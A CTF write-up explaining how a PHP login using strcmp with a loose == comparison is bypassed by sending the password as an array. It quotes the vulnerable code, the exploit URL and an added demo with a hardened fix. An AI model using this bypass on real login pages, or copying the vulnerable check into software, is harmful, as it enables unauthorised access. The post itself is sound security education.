Another one of this year's ABCTF (2016) challenges involved a login page and bypassing PHP's strcmp.
This was a unique CTF authentication bypass challenge, and I just had to share it!
I recommend checking out ABCTF if you ever get a chance, as it is my favorite beginner-friendly CTF.
Finally, take a look at the PHP strcmp docs if you want to follow along at home.
If you prefer video and audio over just reading the text, then you can find the YouTube version of this post below.
At first glance, the login page seemed fairly simple.
A not-so-hidden HTML comment in the page source pointed to the source of the form.
<!-- source at source.txt -->
The source.txt file was straightforward: it read the flag into $PASSWORD and did a simple strcmp between that and the password GET parameter.
<?php
$FLAGWEB6 = (file_get_contents("flag.txt"));
$PASSWORD = (file_get_contents("flag.txt")); //haha
if(isset($_GET['password'])){
    // loose == comparison against strcmp's return value
    if(strcmp($PASSWORD, $_GET['password']) == 0){
        $success = true;
    } else{
        $success = false;
    }
} else {
    $success = false;
}
?>
From here, I actually spent quite a while trying to pass a reference to $FLAGWEB6 in my GET request, since those two variables would be the same. Unfortunately, I was never able to get this to work (contact me if I was just missing something silly here!).
Unable to make any headway on that front, I then took a look back at the hint provided with the challenge.
Some ways of comparing two strings are very insecure.
A bit more research turned up the relevant quirk: strcmp expects two strings, and on PHP 5 and 7, handing it an array instead raises a warning and returns NULL rather than an integer (PHP 8 throws a TypeError in that case, which closes this hole).
PHP's query-string parsing builds exactly such an array from a parameter written as password[], so if I set $_GET['password'] to an array (it need not be empty; the request below sends a one-element array, and any array works), strcmp returns NULL. Because the check uses the loose == operator, NULL == 0 evaluates to true, and the comparison passes without the password ever being known (more info).
With this in mind, I sent the following request to the login page.
http://yrmyzscnvh.abctf.xyz/web6/?password[]=%22%22
Once I sent the request, I received the flag and the subsequent 70 points.
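To make the mechanism concrete, here is an added example that is not part of the challenge code or the original post. It reduces the challenge's check to a function, feeds it the string and array values PHP would build from a few query strings, and places a hardened check beside it that rejects non-strings and uses a strict, constant-time comparison. The password value and the request list are constructed for illustration.

```php
<?php
// Added example (not the ABCTF challenge code): reproduce the strcmp bypass
// and show a hardened comparison. Run with: php strcmp_bypass.php
// Assumes PHP 5.6/7.x semantics, where strcmp() given an array emits a
// warning and returns NULL; on PHP 8 it throws a TypeError instead.

$PASSWORD = 'flag{example}';   // constructed stand-in for the contents of flag.txt

// The challenge's check, reduced to a function. The '@' only hides the
// "expects parameter 2 to be string" warning; the NULL return is unchanged.
function vulnerable_check($password)
{
    try {
        return @strcmp($GLOBALS['PASSWORD'], $password) == 0;   // loose ==, so NULL == 0 is true
    } catch (TypeError $e) {                                    // PHP 8 refuses non-string arguments
        return false;
    }
}

// Hardened: insist on a string, then compare strictly and in constant time.
function hardened_check($password)
{
    if (!is_string($password)) {
        return false;
    }
    return hash_equals($GLOBALS['PASSWORD'], $password);
}

// Constructed inputs: what PHP's query-string parser produces for each request.
$requests = [
    'password=wrong'         => 'wrong',
    'password=flag{example}' => 'flag{example}',
    'password[]=%22%22'      => ['""'],   // the write-up's URL: a one-element array
    'password[]='            => [''],     // an array holding an empty string
];

foreach ($requests as $query => $value) {
    printf("%-24s vulnerable=%-5s hardened=%s\n", $query,
        var_export(vulnerable_check($value), true),
        var_export(hardened_check($value), true));
}
```

On PHP 5.6 and 7.x the vulnerable check accepts both array inputs while the hardened one rejects them and only ever accepts the real password; on PHP 8 the array inputs make strcmp() throw, which the example treats as a failed login. Note that even strcmp($a, $b) === 0 would have been safe here, since NULL === 0 is false, but checking is_string() up front is the habit that also survives the next function with a similar non-string quirk.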
While this wasn’t a difficult challenge, I had a lot of fun with this bypass.
This is something that I might put in a future CTF challenge of my own, so be on the lookout for that!
Ray Doyle is an avid pentester/security enthusiast/beer connoisseur who has worked in IT for almost 16 years now. From building machines and the software on them, to breaking into them and tearing it all down; he’s done it all. To show for it, he has obtained an OSCE, OSCP, eCPPT, GXPN, eWPT, eWPTX, SLAE, eMAPT, Security+, ICAgile CP, ITIL v3 Foundation, and even a sabermetrics certification!
He currently serves as a Senior Staff Adversarial Engineer for Avalara, and his previous position was a Principal Penetration Testing Consultant for Secureworks.
[…] The strcmp vuln has been around for a very long time! Comparing a string with a string is fine, but comparing with an array returns NULL! And NULL == 0 => true (:v) See more at Bypass strcmp php […]